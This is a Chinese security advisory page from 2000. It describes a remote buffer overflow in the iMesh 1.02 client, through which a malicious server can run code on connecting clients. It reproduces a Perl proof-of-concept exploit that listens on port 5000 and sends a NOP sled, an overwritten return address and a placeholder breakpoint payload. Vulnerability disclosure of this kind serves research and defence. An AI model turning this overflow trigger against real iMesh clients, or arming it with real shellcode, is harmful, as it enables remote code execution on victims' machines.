iMesh 1.02远程溢出漏洞
发布日期:2000-06-23
更新日期:2000-06-23
受影响系统:
iMesh 1.02
描述:
iMesh 1.02中存在一个缓冲区溢出漏洞,攻击者可能执行任意代码。
当iMesh客户端连结到一个服务器时,服务器可以利用这个漏洞来攻
击iMesh客户,并可能在iMesh客户端正在运行的主机上执行任意命令。
<* 来源: Chopsui-cide[MmM] 2000
http://midgets.box.sk/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
#
# iMesh 1.02 vulnerability
# Chopsui-cide[MmM] 2000
# http://midgets.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# A buffer overflow exists in iMesh 1.02 that allows the execution
# of arbitrary code. When the iMesh client connects to a server,
# the server is able to exploit the vulnerability and execute
# arbitrary code on the system the client is running on.
#
use IO::Socket;
$localhost = "localhost";
$port = "5000";
# Dummy payload
$payload = "";
$c = 0;
while($c < 0x1aa) {
$payload .= "\x90";
$c += 1;
};
$payload .= "\xcc"; # raise exception 03h
$es = "";
$c = 0;
while($c < 0x2723) {
$es .= "\x90";
$c += 1;
};
$es .= "\x43\x04\x43\x00";
$c = 0;
while($c < 12) {
$es .= "\x90";
$c += 1;
};
$es .= $payload;
#print "$es";
$lsock = IO::Socket::INET->new(Proto=>"tcp", LocalHost=>$localhost, LocalPort=>$port, Listen=>1) || die "unable to create socket
.\n";
print "waiting for connection on port $port...";
$accsock = $lsock->accept();
print "connected.\n";
print $accsock "$es";
sleep(5);
close($accsock);
close($lsock);
建议:
暂无
浏览次数:5934
严重程度:0(网友投票)
